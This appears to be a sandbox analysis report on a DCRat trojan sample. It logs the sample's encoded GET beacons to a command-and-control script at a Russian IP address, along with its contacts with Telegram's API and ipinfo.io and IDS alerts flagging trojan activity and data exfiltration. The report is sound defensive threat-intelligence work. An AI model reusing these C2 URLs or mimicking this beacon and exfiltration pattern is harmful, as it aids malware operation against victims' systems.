http://62.109.20.14/Proton/BettereternalImage9/Temp/GeoWindowsSecureBetter/3protect/Js8generator/linuxSql/Longpollvoiddb/SecureBetter/HttpCdnImage/1private/Eternalrequest/Wp/Bigloadline0Update/GeneratorCpuTest/Cdn4/1/dbwordpress.php?KceKnSEJpDc0PprcS8dJLekea6jcH=vlZZCFJNshmW4TNnsZgAnocZup2Atq&lBtS1b0mmTFQ5hzjQRwNJ5H=GI9pWNIdBzB&e359000dbc8e270a3132dc34565389de=3gTZ1UmNzMWY1IDO5UzM5EWO1ETNyQmN3MTOmNTOjJjY5MmM5EDM1ADM2YjM0AzM0YzMykzM&9cc51d04bb97b9124574f405cfce076f=QNjZjMxUzNmR2MxAjNihDMlVTOlNGMyATO4MDOwYTZjFmYjdjY0UWN&7165dbbbc6bac2e515dbae4b26d31078=d1nIyMzY2E2Y2EWZyYjZyYDN3kTOmlDOjZjMzImY1MWY0QmY0E2M4MWMjJiOiYzY4gTOwAjNxcjZlljNlNDOjJzYiVDMkBDZ2MGO5UGZiwiI0AzMhRjY2ITMkBTOhVTNzMGNhlTN2kjZiZDM3MWOlZTZlZmN2MTM4IiOikjM4UmMjJTN1QmMwU2NwgDM1kjYzEzYwQGOkBDMhVTYis3W
CN: RU | Reputation: malicious
PID: 316 | Process: a28a2dac43cb3e22c3957bdcfe04aa1b.exe | Method: GET | HTTP Code: 200 | IP: 62.109.20.14:80
http://62.109.20.14/Proton/BettereternalImage9/Temp/GeoWindowsSecureBetter/3protect/Js8generator/linuxSql/Longpollvoiddb/SecureBetter/HttpCdnImage/1private/Eternalrequest/Wp/Bigloadline0Update/GeneratorCpuTest/Cdn4/1/dbwordpress.php?BVM1x4r=Yg25Flt7diq3aLscLP&KmOGgdYO5kVWBa=rmHuRlZfiQUbvzmuqhfg5KZW&014dfb47aca2d64b0b4a22d60da59ade=941d46f807eed180dedb47e02b141501&9cc51d04bb97b9124574f405cfce076f=wNlNTMyAzN5E2NjVTZ4ATOlZWOmBTZyEWYhRjM4ATZ3MDZ1U2MhhDZ&BVM1x4r=Yg25Flt7diq3aLscLP&KmOGgdYO5kVWBa=rmHuRlZfiQUbvzmuqhfg5KZW
CN: RU | Type: text | Size: 2.09 Kb | Reputation: malicious
PID: 316 | Process: a28a2dac43cb3e22c3957bdcfe04aa1b.exe | Method: GET | HTTP Code: 200 | IP: 62.109.20.14:80
http://62.109.20.14/Proton/BettereternalImage9/Temp/GeoWindowsSecureBetter/3protect/Js8generator/linuxSql/Longpollvoiddb/SecureBetter/HttpCdnImage/1private/Eternalrequest/Wp/Bigloadline0Update/GeneratorCpuTest/Cdn4/1/dbwordpress.php?KceKnSEJpDc0PprcS8dJLekea6jcH=vlZZCFJNshmW4TNnsZgAnocZup2Atq&lBtS1b0mmTFQ5hzjQRwNJ5H=GI9pWNIdBzB&e359000dbc8e270a3132dc34565389de=3gTZ1UmNzMWY1IDO5UzM5EWO1ETNyQmN3MTOmNTOjJjY5MmM5EDM1ADM2YjM0AzM0YzMykzM&9cc51d04bb97b9124574f405cfce076f=QNjZjMxUzNmR2MxAjNihDMlVTOlNGMyATO4MDOwYTZjFmYjdjY0UWN&7165dbbbc6bac2e515dbae4b26d31078=d1nI0MGO4cDNwEjNmN2MhVzYxIWMiJTNjRmNzQ2M1EWO4gTM0YGMhJTN1IiOiYzY4gTOwAjNxcjZlljNlNDOjJzYiVDMkBDZ2MGO5UGZiwiI0AzMhRjY2ITMkBTOhVTNzMGNhlTN2kjZiZDM3MWOlZTZlZmN2MTM4IiOikjM4UmMjJTN1QmMwU2NwgDM1kjYzEzYwQGOkBDMhVTYis3W&d67774f54f475434990c74d9288eddd9=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
CN: RU | Type: text | Size: 104 b | Reputation: malicious
PID: 316 | Process: a28a2dac43cb3e22c3957bdcfe04aa1b.exe | Method: GET | HTTP Code: 200 | IP: 62.109.20.14:80
http://62.109.20.14/Proton/BettereternalImage9/Temp/GeoWindowsSecureBetter/3protect/Js8generator/linuxSql/Longpollvoiddb/SecureBetter/HttpCdnImage/1private/Eternalrequest/Wp/Bigloadline0Update/GeneratorCpuTest/Cdn4/1/dbwordpress.php?KceKnSEJpDc0PprcS8dJLekea6jcH=vlZZCFJNshmW4TNnsZgAnocZup2Atq&lBtS1b0mmTFQ5hzjQRwNJ5H=GI9pWNIdBzB&e359000dbc8e270a3132dc34565389de=3gTZ1UmNzMWY1IDO5UzM5EWO1ETNyQmN3MTOmNTOjJjY5MmM5EDM1ADM2YjM0AzM0YzMykzM&9cc51d04bb97b9124574f405cfce076f=QNjZjMxUzNmR2MxAjNihDMlVTOlNGMyATO4MDOwYTZjFmYjdjY0UWN&d67774f54f475434990c74d9288eddd9=QX9JSUNJiOiMDOzgDOwQTOmBzM5E2YxUmY0MDMwAjZiF2NkNzY5gjYiwiI1IGMzIGO5YWZ5MGNjFDZ5kTNwUjY2IzMmFTZ3kDNxQmZ2YGZwUjM3IiOiYzY4gTOwAjNxcjZlljNlNDOjJzYiVDMkBDZ2MGO5UGZiwiI0AzMhRjY2ITMkBTOhVTNzMGNhlTN2kjZiZDM3MWOlZTZlZmN2MTM4IiOikjM4UmMjJTN1QmMwU2NwgDM1kjYzEzYwQGOkBDMhVTYis3W
CN: RU | Type: text | Size: 104 b | Reputation: malicious
PID: 316 | Process: a28a2dac43cb3e22c3957bdcfe04aa1b.exe | Method: GET | HTTP Code: 200 | IP: 62.109.20.14:80
http://62.109.20.14/Proton/BettereternalImage9/Temp/GeoWindowsSecureBetter/3protect/Js8generator/linuxSql/Longpollvoiddb/SecureBetter/HttpCdnImage/1private/Eternalrequest/Wp/Bigloadline0Update/GeneratorCpuTest/Cdn4/1/dbwordpress.php?KceKnSEJpDc0PprcS8dJLekea6jcH=vlZZCFJNshmW4TNnsZgAnocZup2Atq&lBtS1b0mmTFQ5hzjQRwNJ5H=GI9pWNIdBzB&e359000dbc8e270a3132dc34565389de=3gTZ1UmNzMWY1IDO5UzM5EWO1ETNyQmN3MTOmNTOjJjY5MmM5EDM1ADM2YjM0AzM0YzMykzM&9cc51d04bb97b9124574f405cfce076f=QNjZjMxUzNmR2MxAjNihDMlVTOlNGMyATO4MDOwYTZjFmYjdjY0UWN&7165dbbbc6bac2e515dbae4b26d31078=d1nI0MGO4cDNwEjNmN2MhVzYxIWMiJTNjRmNzQ2M1EWO4gTM0YGMhJTN1IiOiYzY4gTOwAjNxcjZlljNlNDOjJzYiVDMkBDZ2MGO5UGZiwiI0AzMhRjY2ITMkBTOhVTNzMGNhlTN2kjZiZDM3MWOlZTZlZmN2MTM4IiOikjM4UmMjJTN1QmMwU2NwgDM1kjYzEzYwQGOkBDMhVTYis3W&d67774f54f475434990c74d9288eddd9=d1nIiojIzgzM4gDM0kjZwMTOhNWMlJGNzADMwYmYhdDZzMWO4ImIsICNjhDO3QDMxYjZjNTY1MWMiFjYyUzYkZzMkNTNhlDO4EDNmBTYyUTNiojI2MGO4kDMwYTM3YWZ5YTZzgzYyMmY1ADZwQmNjhTOlRmIsICNwMTY0ImNyEDZwkTY1UzMjRTY5UjN5YmY2AzNjlTZ2UWZmZjNzEDOiojI5IDOlJzYyUTNkJDMldDM4ATN5I2MxMGMkhDZwATY1EmI7xSfiADWmlGOqlkNJNUT0E1VOtmUH1EeBpWTxcGVPxmTXl1akpmW3V1RPxmRX1EaOpnT6lFRP1mWE5UNFRkWzEEVNl2dpl0LJl2TpFlaZNTVtllaWdVTqZleNJTQ650asRVTqp0RP1mUH5kMZJTT41EValXVU10MZRVT0k1RPNzZql0cJNUTp9maJlmUq5kakRVWpZ1VatmQEpFbadVW410RPBTWqplMnRVWpZUbNlXUX9UeJpWWxMGVZRTRUpVaKlXZ2k0UZBjRHJFMohlWpd3UOZTSDRWM5clW0x2RWdnVXp1cOxWSzl0UaJDbHRmaGtWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETpFlbjhmUzUVavpWSzkzRaVHbyYVVOVVUpdXaJ9kSp9UawcVWqp0VahlTYFWa3lWSapUaPlWVtJmdod0Y2p0MZBXMwMGcKNETptWeNd2YtJGcCh0YsJ1MVdWUU10Z3dlWrlzVUdWWElUN4dVY0ZUbSdWUq5URxUVUvFUallEZF10M0kWTnFURJZlQxE1ZBRUTwkFVMFzaHlEcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwVEMM9EaDlUeWdEZ3Z0RaJkQ5NmasdUY3ZUbjhkQTFFSaZUSrpEWZtWNXlFMOxWS2k0UaRnRtRlVCFjUpdXaJ9kSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWEl0cG1mY2xmMjpnVtpldKhUVnNGRJpHZzI2a1cVYYpUaPlWSYp1V1cVYYp0QMljSDpFcKhkWoFDMMxmQzIWeWhlUp9maJxWNyImNWdlYwJlbJNXSD10dBRUT3FkaJZTSDJGaSNzY2JkbJNXSpJGcGd0YUJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUea
lXOtl0cJNVT3NGVNVXSEx0MnpXT1VEROl2bqlka5ckYpdXaJRlVrlkNJNVZ5JlbiFTOykVa3lWSoVjMiNnVykVeG1WUp9maJVXOXFmbW12YpdXaJhWNyI2cWJTW5ZUbRl2bqlUNShVYqp0QMl2YU1UdZpXT4RzQNpXRqxUMRpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETp1keNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiMDOzgDOwQTOmBzM5E2YxUmY0MDMwAjZiF2NkNzY5gjYiwiIilDN1IGO4UjZjFWM5YTOmZDZzgTOmZTZkRmMjljMiRGN3kDZwMjZyIiOiYzY4gTOwAjNxcjZlljNlNDOjJzYiVDMkBDZ2MGO5UGZiwiI0AzMhRjY2ITMkBTOhVTNzMGNhlTN2kjZiZDM3MWOlZTZlZmN2MTM4IiOikjM4UmMjJTN1QmMwU2NwgDM1kjYzEzYwQGOkBDMhVTYis3W
CN: RU | Type: text | Size: 104 b | Reputation: malicious
PID: 316 | Process: a28a2dac43cb3e22c3957bdcfe04aa1b.exe | Method: GET | HTTP Code: 200 | IP: 62.109.20.14:80
http://62.109.20.14/Proton/BettereternalImage9/Temp/GeoWindowsSecureBetter/3protect/Js8generator/linuxSql/Longpollvoiddb/SecureBetter/HttpCdnImage/1private/Eternalrequest/Wp/Bigloadline0Update/GeneratorCpuTest/Cdn4/1/dbwordpress.php?KceKnSEJpDc0PprcS8dJLekea6jcH=vlZZCFJNshmW4TNnsZgAnocZup2Atq&lBtS1b0mmTFQ5hzjQRwNJ5H=GI9pWNIdBzB&e359000dbc8e270a3132dc34565389de=3gTZ1UmNzMWY1IDO5UzM5EWO1ETNyQmN3MTOmNTOjJjY5MmM5EDM1ADM2YjM0AzM0YzMykzM&9cc51d04bb97b9124574f405cfce076f=QNjZjMxUzNmR2MxAjNihDMlVTOlNGMyATO4MDOwYTZjFmYjdjY0UWN&7165dbbbc6bac2e515dbae4b26d31078=d1nIhJmNyYmZkFjY2ATO5M2M3AjMzAzNmVmM0I2NwQmN1UzYjRDM5MDZ5IiOiYzY4gTOwAjNxcjZlljNlNDOjJzYiVDMkBDZ2MGO5UGZiwiI0AzMhRjY2ITMkBTOhVTNzMGNhlTN2kjZiZDM3MWOlZTZlZmN2MTM4IiOikjM4UmMjJTN1QmMwU2NwgDM1kjYzEzYwQGOkBDMhVTYis3W
CN: RU | Type: text | Size: 104 b | Reputation: malicious
PID: 316 | Process: a28a2dac43cb3e22c3957bdcfe04aa1b.exe | Method: GET | HTTP Code: 200 | IP: 62.109.20.14:80
http://62.109.20.14/Proton/BettereternalImage9/Temp/GeoWindowsSecureBetter/3protect/Js8generator/linuxSql/Longpollvoiddb/SecureBetter/HttpCdnImage/1private/Eternalrequest/Wp/Bigloadline0Update/GeneratorCpuTest/Cdn4/1/dbwordpress.php?KceKnSEJpDc0PprcS8dJLekea6jcH=vlZZCFJNshmW4TNnsZgAnocZup2Atq&lBtS1b0mmTFQ5hzjQRwNJ5H=GI9pWNIdBzB&e359000dbc8e270a3132dc34565389de=3gTZ1UmNzMWY1IDO5UzM5EWO1ETNyQmN3MTOmNTOjJjY5MmM5EDM1ADM2YjM0AzM0YzMykzM&9cc51d04bb97b9124574f405cfce076f=QNjZjMxUzNmR2MxAjNihDMlVTOlNGMyATO4MDOwYTZjFmYjdjY0UWN&d67774f54f475434990c74d9288eddd9=0VfiIiOiMDOzgDOwQTOmBzM5E2YxUmY0MDMwAjZiF2NkNzY5gjYiwiIyMzY2E2Y2EWZyYjZyYDN3kTOmlDOjZjMzImY1MWY0QmY0E2M4MWMjJiOiYzY4gTOwAjNxcjZlljNlNDOjJzYiVDMkBDZ2MGO5UGZiwiI0AzMhRjY2ITMkBTOhVTNzMGNhlTN2kjZiZDM3MWOlZTZlZmN2MTM4IiOikjM4UmMjJTN1QmMwU2NwgDM1kjYzEzYwQGOkBDMhVTYis3W
CN: RU | Type: text | Size: 104 b | Reputation: malicious

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
 |  | 209.197.3.8:80 | ctldl.windowsupdate.com | STACKPATH-CDN | US | whitelisted
316 | a28a2dac43cb3e22c3957bdcfe04aa1b.exe | 149.154.167.220:443 | api.telegram.org | Telegram Messenger Inc | GB | malicious
316 | a28a2dac43cb3e22c3957bdcfe04aa1b.exe | 62.109.20.14:80 |  | JSC IOT | RU | malicious
316 | a28a2dac43cb3e22c3957bdcfe04aa1b.exe | 2.16.202.123:80 | apps.identrust.com | Akamai International B.V. | NL | suspicious
316 | a28a2dac43cb3e22c3957bdcfe04aa1b.exe | 34.117.59.81:443 | ipinfo.io | GOOGLE-CLOUD-PLATFORM | US | whitelisted

DNS requests

Domain | IP | Reputation
ipinfo.io | 34.117.59.81 | shared
apps.identrust.com | 2.16.202.123, 95.101.54.195 | shared
ctldl.windowsupdate.com | 209.197.3.8 | whitelisted
api.telegram.org | 149.154.167.220 | shared

Threats

PID | Process | Class | Message
316 | a28a2dac43cb3e22c3957bdcfe04aa1b.exe | A Network Trojan was detected | ET MALWARE DCRAT Activity (GET)
316 | a28a2dac43cb3e22c3957bdcfe04aa1b.exe | Device Retrieving External IP Address Detected | ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)
 |  | Misc activity | ET HUNTING Telegram API Domain in DNS Lookup
316 | a28a2dac43cb3e22c3957bdcfe04aa1b.exe | Misc activity | ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI)
316 | a28a2dac43cb3e22c3957bdcfe04aa1b.exe | Misc activity | ET HUNTING Telegram API Certificate Observed
316 | a28a2dac43cb3e22c3957bdcfe04aa1b.exe | Misc activity | ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI)
316 | a28a2dac43cb3e22c3957bdcfe04aa1b.exe | Misc activity | ET HUNTING Telegram API Certificate Observed
316 | a28a2dac43cb3e22c3957bdcfe04aa1b.exe | A Network Trojan was detected | ET HUNTING Observed Malicious Filename in Outbound POST Request (Information.txt)
2 ETPRO signatures available at the full report
No debug info